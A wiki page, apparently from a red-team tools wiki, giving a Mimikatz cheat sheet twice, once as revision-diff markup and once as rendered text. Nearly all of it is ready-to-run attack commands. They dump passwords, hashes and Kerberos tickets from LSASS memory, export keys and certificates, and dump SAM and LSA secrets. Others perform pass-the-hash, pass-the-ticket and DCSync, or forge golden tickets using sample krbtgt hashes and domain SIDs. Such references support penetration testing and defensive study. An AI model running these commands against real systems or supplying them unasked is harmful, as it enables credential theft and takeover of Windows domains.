Mimikatz: Difference between revisions

From RCATs
No edit summary
No edit summary
 
(5 intermediate revisions by one other user not shown)
Line 1: Line 1:
[[Category:Tools]]
[[Category:Tools]]
=Description=
Mimikatz<ref>https://github.com/ParrotSec/mimikatz</ref> is a tool that is primarily used for reading and extracting plaintext passwords, hashes, and other credentials from memory. It is often used by penetration testers and red teamers to gain access to sensitive data and systems. Additionally, it can also be used to perform other tasks such as generating Kerberos tickets, and extracting digital certificates.
==== Links: ====
<syntaxhighlight lang="powershell">
https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49
</syntaxhighlight>
=Commands=
=Commands=
==sekurlsa==
==sekurlsa==
<syntaxhighlight lang="powershell">
<syntaxhighlight lang="powershell">
Line 28: Line 35:
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
</syntaxhighlight>
</syntaxhighlight>


==crypto==
==crypto==
Line 80: Line 86:
==PTH==
==PTH==
<syntaxhighlight lang="powershell">
<syntaxhighlight lang="powershell">
Attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command.
# Attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a


Attempts to authenticate as the specified user with the provided AES-256 hash.
# Attempts to authenticate as the specified user with the provided AES-256 hash.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9


Attempts to authenticate as the specified user with the provided NTLM hash and AES-256 hash.
# Attempts to authenticate as the specified user with the provided NTLM hash and AES-256 hash.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9


Attempts to authenticate as the specified user with the provided NTLM hash and runs cmd.exe.
# Attempts to authenticate as the specified user with the provided NTLM hash and runs cmd.exe.
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe
</syntaxhighlight>
</syntaxhighlight>
==ekeys==
<syntaxhighlight lang="powershell">
# Extracts EKEYS (Encrypted Key) keys from the Local Security Authority Subsystem Service (LSASS) process memory.
sekurlsa::ekeys
</syntaxhighlight>
==dapi ==
<syntaxhighlight lang="powershell">
# Extracts Data Protection API (DPAPI) credentials from the LSASS process memory.
sekurlsa::dpapi
</syntaxhighlight>
==minidump==
<syntaxhighlight lang="powershell">
# Extracts information from a memory dump of the LSASS process.
sekurlsa::minidump lsass.dmp
</syntaxhighlight>
==PTT==
<syntaxhighlight lang="powershell">
#Impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system.
kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi
</syntaxhighlight>
==Golden & Silver Tickets ==
<syntaxhighlight lang="powershell">
#Create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain.
kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi
kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080
kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi
</syntaxhighlight>
==tgt==
<syntaxhighlight lang="powershell">
# Extracts Kerberos TGTs from the LSASS process memory.
kerberos::tgt
# Removes TGTs from memory.
kerberos::purge
</syntaxhighlight>
=References=
<references />

Latest revision as of 04:47, 21 August 2023

Description

Mimikatz[1] is a tool that is primarily used for reading and extracting plaintext passwords, hashes, and other credentials from memory. It is often used by penetration testers and red teamers to gain access to sensitive data and systems. Additionally, it can also be used to perform other tasks such as generating Kerberos tickets, and extracting digital certificates.

Links:

https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49

Commands

sekurlsa

# Command is used to extract logon passwords from the Windows Security Support Provider (SSP)
sekurlsa::logonpasswords 

# Command will extract all logon passwords, including those of network connections.
sekurlsa::logonPasswords full

# Command will export Kerberos tickets to a file.
sekurlsa::tickets /export 

# Command is used to perform a pass-the-hash attack on a Windows system. It attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command.
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

# This command will list and export Kerberos tickets to a file.
kerberos::list /export

# This command is used to impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system. The specified file is used as the TGT.
kerberos::ptt c:\chocolate.kirbi

# This command is used to create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain. The specified parameters are used to set the properties of the Golden Ticket, such as the administrator account and domain SID
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

This command is used to extract cryptographic information from the CryptoAPI (CAPI) of a Windows system.
crypto::capi

# This command is used to extract cryptographic information from the Cryptography API: Next Generation (CNG) of a Windows system.
crypto::cng

# This command is used to export certificates from a Windows system.
crypto::certificates /export 

# This command is used to export certificates from the local machine certificate store of a Windows system.
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

# This command is used to export cryptographic keys from a Windows system.
crypto::keys /export

# This command is used to export cryptographic keys from the local machine of a Windows system.
crypto::keys /machine /export

vault & lsadump

Extracts credentials from the Windows Vault.
vault::cred

Lists the contents of the Windows Vault.
vault::list

Elevates the current user's privileges to that of the Local System account.
token::elevate

Reverts the current user's privileges to their previous state before elevation.
token::revert

Dumps the Security Account Manager (SAM) database, which stores local user account information.
lsadump::sam

Dumps the secrets stored in the Local Security Authority (LSA) of a Windows system.
lsadump::secrets

Dumps the LSA secrets cache, which contains recently used authentication information.
lsadump::cache

Perform a DCSync attack, which is used to replicate Active Directory data from a domain controller.
lsadump::dcsync /user:domain\krbtgt /domain:lab.local

PTH

# Attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a

# Attempts to authenticate as the specified user with the provided AES-256 hash.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9

# Attempts to authenticate as the specified user with the provided NTLM hash and AES-256 hash.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9

# Attempts to authenticate as the specified user with the provided NTLM hash and runs cmd.exe.
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe

ekeys

# Extracts EKEYS (Encrypted Key) keys from the Local Security Authority Subsystem Service (LSASS) process memory.
sekurlsa::ekeys

dapi

# Extracts Data Protection API (DPAPI) credentials from the LSASS process memory.
sekurlsa::dpapi

minidump

# Extracts information from a memory dump of the LSASS process.
sekurlsa::minidump lsass.dmp

PTT

#Impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system.
kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi

Golden & Silver Tickets

#Create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain.
kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi
kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080
kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi

tgt

# Extracts Kerberos TGTs from the LSASS process memory.
kerberos::tgt

# Removes TGTs from memory.
kerberos::purge

References